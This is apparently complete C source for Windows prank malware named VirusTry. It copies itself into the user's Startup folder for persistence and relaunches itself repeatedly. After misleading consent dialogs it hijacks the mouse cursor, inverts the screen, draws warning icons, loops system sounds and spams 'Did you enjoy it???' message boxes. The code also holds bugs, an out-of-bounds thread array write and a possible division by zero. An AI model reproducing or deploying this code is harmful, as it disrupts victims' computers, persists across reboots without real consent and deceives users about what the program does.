#if defined(UNICODE) && !defined(_UNICODE)
    #define _UNICODE
#elif defined(_UNICODE) && !defined(UNICODE)
    #define UNICODE
#endif

#include <pthread.h>
#include <tchar.h>
#include <windows.h>
#include <shlobj.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "winmm.lib")


HINSTANCE g_hThisInstance;

// Stores the current location of the running app
WCHAR g_szAppPath[100];

// Stores the startup path of windows
WCHAR g_szStartupPath[100];

// Setting
void Init();
BOOL CopySelf();
BOOL IsInStartupPath();

// Startup
void StartVirus();
void ExecuteFromStartup(LPCWSTR arg);

// Threads
void* Thread_mouse_change(void* args);

int WINAPI WinMain (HINSTANCE hThisInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR lpszArgument,
                     int nCmdShow)
{
    LPWSTR* args = NULL;
    int argc = 0;
    Init();
    BOOL copyf = CopySelf();

    args = CommandLineToArgvW(GetCommandLineW(), &argc);

    if ((argc > 1) && (IsInStartupPath() == TRUE))
    {
        if (lstrcmpW(args[1], L"/main") != 0)
        {
            ExecuteFromStartup(NULL);
            return 0;
        }
        LocalFree(args);
        StartVirus();
    } else if (copyf == TRUE) {
        pthread_t pht;
        LocalFree(args);
        if (MessageBoxA(NULL, "Hi! \nThis is a SoftWare Execute. ", "Startup", MB_OKCANCEL) == IDCANCEL) {
            return 0;
        }
        if (MessageBoxA(NULL, "We are now prepare to show you some icons on your desktop. \nAre you okay? ", "Get Ready", MB_OKCANCEL) == IDCANCEL) {
            return 0;
        }
        //Sleep(20000);
        Sleep(20);
        pthread_create(&pht, NULL, Thread_mouse_change, NULL);
        Sleep(15000);
        for (int i = 0; i < 5; i++)
        {
            ExecuteFromStartup(L"/main");
            Sleep(20000);
        }
        exit(0);
    }

    return -1;
}

void* Thread_play(void* args)
{
    LPCSTR sound;
    while (1) {
        switch (rand() % 5)
        {
        case 0:
            sound = "SystemExclamation";
            break;
        case 1:
            sound = "SystemAsterisk";
            break;
        case 2:
            sound = "SystemQuestion";
            break;
        case 3:
            sound = "SystemHand";
            break;
        case 4:
            sound = "SystemStart";
            break;
        }
        PlaySoundA(sound, NULL, SND_SYNC);
    }
}

void* Thread_show(void* args)
{
    HWND hwnd = GetDesktopWindow();
    HDC hdc = GetWindowDC(hwnd);
    POINT point;
    LPCSTR icon;

    while (1)
    {
        GetCursorPos(&point);
        switch (rand() % 5)
        {
        case 0:
            icon = IDI_WARNING;
            break;
        case 1:
            icon = IDI_ERROR;
            break;
        case 2:
            icon = IDI_QUESTION;
            break;
        case 3:
            icon = IDI_SHIELD;
            break;
        case 4:
            icon = IDI_WINLOGO;
            break;
        }
        DrawIcon(hdc, point.x, point.y, LoadIcon(NULL, icon));
        Sleep(10);
    }
}

void* Thread_color(void* args)
{
    HWND hwnd = GetDesktopWindow();
    HDC hdc = GetWindowDC(hwnd);
    while (1)
    {
        BitBlt(hdc, 0, 0,
               GetSystemMetrics(SM_CXSCREEN),
               GetSystemMetrics(SM_CYSCREEN),
               hdc, 0, 0,
               DSTINVERT
               );
               Sleep(500);
    }
}

void* Thread_msg(void* args)
{
    while (1)
    {
        Sleep(20000);
        MessageBoxW(NULL, L"Did you enjoy it??? ", L"lol", MB_YESNO);
    }
}

void* Thread_mouse_change(void* args)
{
    POINT point;
    int v1, v2, v3, v4, v5, v6;
    while (1)
    {
        printf("a");
        GetCursorPos(&point);
        v1 = rand() % 20 + 1;
        v2 = rand() % 20 + 1;
        v3 = rand() % 20 + 1;
        v4 = rand() % 20;
        printf("b");
        v5 = (v1 * (v3 - v4)) * v1 + v2;
        printf("b2");
        v6 = (v2 / v3 * v1) / v4;
        printf("c");
        SetCursorPos(point.x + v5, point.y + v6);
        Sleep(10);
    }
}

void StartVirus()
{
    pthread_t pht[4];

    pthread_create(&pht[1], NULL, Thread_play, NULL);
    pthread_create(&pht[2], NULL, Thread_show, NULL);
    Sleep(20000);
    pthread_create(&pht[3], NULL, Thread_color, NULL);
    pthread_create(&pht[4], NULL, Thread_msg, NULL);

    pthread_exit(NULL);
}

void ExecuteFromStartup(LPCWSTR arg)
{
    WCHAR szStartup[100];
    lstrcpyW(szStartup, g_szStartupPath);
    lstrcatW(szStartup, L"\\VirusTry.exe");

    ShellExecuteW(NULL, NULL, szStartup, arg, NULL, SW_SHOW);
}

BOOL IsInStartupPath()
{
    WCHAR szStartup[100];
    lstrcpyW(szStartup, g_szStartupPath);
    lstrcatW(szStartup, L"\\VirusTry.exe");

    if (lstrcmpW(szStartup, g_szAppPath) == 0) {
        return TRUE;
    }

    return FALSE;
}

BOOL CopySelf()
{
    WCHAR szDest[100];
    lstrcpyW(szDest, g_szStartupPath);
    lstrcatW(szDest, L"\\VirusTry.exe");

    if (CopyFileW(g_szAppPath, szDest, FALSE))
    {
        return TRUE;
    }
    return FALSE;
}

void Init()
{
    GetModuleFileNameW(g_hThisInstance, g_szAppPath, 100);
    SHGetFolderPathW(NULL, CSIDL_STARTUP, NULL, NULL, g_szStartupPath);
}

